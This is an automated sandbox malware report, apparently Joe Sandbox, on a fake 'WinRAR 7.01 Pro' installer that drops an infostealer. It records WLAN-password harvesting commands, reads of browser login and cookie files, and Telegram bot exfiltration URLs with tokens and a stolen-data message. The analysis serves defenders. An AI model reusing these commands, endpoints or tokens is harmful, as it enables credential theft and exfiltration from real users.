          Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
          Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BE}.
          Source: winrar_x64_701ar.exe, 00000001.00000002.2998601755.000002628717B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATAY
          Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B681000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&++
          Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B695000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BBA170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6C3BBA170
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BCB630 GetProcessHeap,1_2_00007FF6C3BCB630
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB9458 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF6C3BB9458
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BBA354 SetUnhandledExceptionFilter,1_2_00007FF6C3BBA354
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BBA170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6C3BBA170
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BBFEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF6C3BBFEC8
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeMemory allocated: page read and write | page guardJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess created: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe "C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe" Jump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeProcess created: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe "C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BD1230 cpuid 1_2_00007FF6C3BD1230
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: GetLocaleInfoW,1_2_00007FF6C3BB2954
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeQueries volume information: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BB41D0 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,CloseHandle,1_2_00007FF6C3BB41D0
          Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exeCode function: 1_2_00007FF6C3BA2A74 GetVersionExW,1_2_00007FF6C3BA2A74
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 3.3._microsoft_corporation.exe.26bbf08.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 3.3._microsoft_corporation.exe.26bbf08.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.3._microsoft_corporation.exe.26bbf08.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000003.1786072465.00000000026BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
          Windows Management Instrumentation
          1
          DLL Side-Loading
          11
          Process Injection
          1
          Masquerading
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Email Collection
          1
          Web Service
          Exfiltration Over Other Network Medium1
          Data Encrypted for Impact
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          11
          Disable or Modify Tools
          LSASS Memory351
          Security Software Discovery
          Remote Desktop Protocol11
          Archive Collected Data
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
          Virtualization/Sandbox Evasion
          Security Account Manager251
          Virtualization/Sandbox Evasion
          SMB/Windows Admin Shares1
          Data from Local System
          1
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
          Process Injection
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput Capture3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information
          LSA Secrets1
          System Network Configuration Discovery
          SSHKeylogging4
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
          Software Packing
          Cached Domain Credentials4
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync147
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1492461 Sample: WinRAR 7.01 Pro.exe Startdate: 13/08/2024 Architecture: WINDOWS Score: 100 52 api.telegram.org 2->52 54 238.14.8.0.in-addr.arpa 2->54 56 2 other IPs or domains 2->56 64 Suricata IDS alerts for network traffic 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus / Scanner detection for submitted sample 2->68 72 7 other signatures 2->72 9 WinRAR 7.01 Pro.exe 4 2->9         started        signatures3 70 Uses the Telegram API (likely for C&C communication) 52->70 process4 file5 38 C:\Users\user\...\winrar_x64_701ar.exe, PE32+ 9->38 dropped 40 C:\Users\user\...\_microsoft_corporation.exe, PE32 9->40 dropped 42 C:\Users\user\...\WinRAR 7.01 Pro.exe.log, ASCII 9->42 dropped 12 _microsoft_corporation.exe 15 135 9->12         started        17 winrar_x64_701ar.exe 1 24 9->17         started        process6 dnsIp7 58 api.telegram.org 149.154.167.220, 443, 49743, 49744 TELEGRAMRU United Kingdom 12->58 60 icanhazip.com 104.16.185.241, 49741, 80 CLOUDFLARENETUS United States 12->60 62 2 other IPs or domains 12->62 44 C:\Users\user\AppData\...\YPSIACHYXW.png, ASCII 12->44 dropped 46 C:\Users\user\AppData\...\WUTJSCBCFX.jpg, ASCII 12->46 dropped 48 C:\Users\user\AppData\...\ZBEDCJPBEY.jpg, ASCII 12->48 dropped 50 2 other malicious files 12->50 dropped 78 Antivirus detection for dropped file 12->78 80 Multi AV Scanner detection for dropped file 12->80 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->82 84 5 other signatures 12->84 19 cmd.exe 12->19         started        22 cmd.exe 12->22         started        file8 signatures9 process10 signatures11 74 Uses netsh to modify the Windows network and firewall settings 19->74 76 Tries to harvest and steal WLAN passwords 19->76 24 conhost.exe 19->24         started        26 chcp.com 19->26         started        28 netsh.exe 19->28         started        30 findstr.exe 19->30         started        32 conhost.exe 22->32         started        34 chcp.com 22->34         started        36 netsh.exe 22->36         started        process12

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          WinRAR 7.01 Pro.exe45%ReversingLabsByteCode-MSIL.Spyware.Redline
          WinRAR 7.01 Pro.exe100%AviraTR/Dropper.MSIL.Gen
          WinRAR 7.01 Pro.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe100%AviraTR/Dropper.MSIL.Gen
          C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe62%ReversingLabsByteCode-MSIL.Infostealer.Tinba
          C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://support.mozilla.org0%URL Reputationsafe
          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
          https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
          https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders...0%Avira URL Cloudsafe
          https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
          https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=True0%Avira URL Cloudsafe
          https://aka.ms/Vh5j3kI0%Avira URL Cloudsafe
          https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
          https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=7501822710%Avira URL Cloudsafe
          https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=10964258660%Avira URL Cloudsafe
          https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
          https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:150%Avira URL Cloudsafe
          https://aka.ms/odirm0%Avira URL Cloudsafe
          http://icanhazip.com/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          api.mylnikov.org
          104.21.44.66
          truefalse
            unknown
            api.telegram.org
            149.154.167.220
            truetrue
              unknown
              icanhazip.com
              104.16.185.241
              truefalse
                unknown
                238.14.8.0.in-addr.arpa
                unknown
                unknowntrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%F0%9F%93%81%20Uploading%20Log%20Folders...true
                  • Avira URL Cloud: safe
                  unknown
                  https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendMessage?chat_id=750182271&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-13%203:48:43%20pm%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20528110%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%206MM9C%0ARAM:%204095MB%0AHWID:%209F5911B2B1%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20%20Contact%20Developer:%20@FlatLineStealer%0A%20%20%20Join%20The%20Telegram%20Channel:%20@CashOutGangTalk&parse_mode=Markdown&disable_web_page_preview=Truetrue
                  • Avira URL Cloud: safe
                  unknown
                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15false
                  • Avira URL Cloud: safe
                  unknown
                  https://api.telegram.org/bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866true
                  • Avira URL Cloud: safe
                  unknown
                  https://api.telegram.org/bot5912059723:AAEvmpZvnGHJALjBBXk_PBuStnzDRsTe4-M/sendDocument?chat_id=750182271true
                  • Avira URL Cloud: safe
                  unknown
                  http://icanhazip.com/false
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/chrome_newtabtmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFtmp22D7.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/ac/?q=tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installtmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://aka.ms/Vh5j3kIwinrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://support.mozilla.orgtmp22D7.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplestmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.ecosia.org/newtab/tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmp22D7.tmp.dat.3.drfalse
                  • URL Reputation: safe
                  unknown
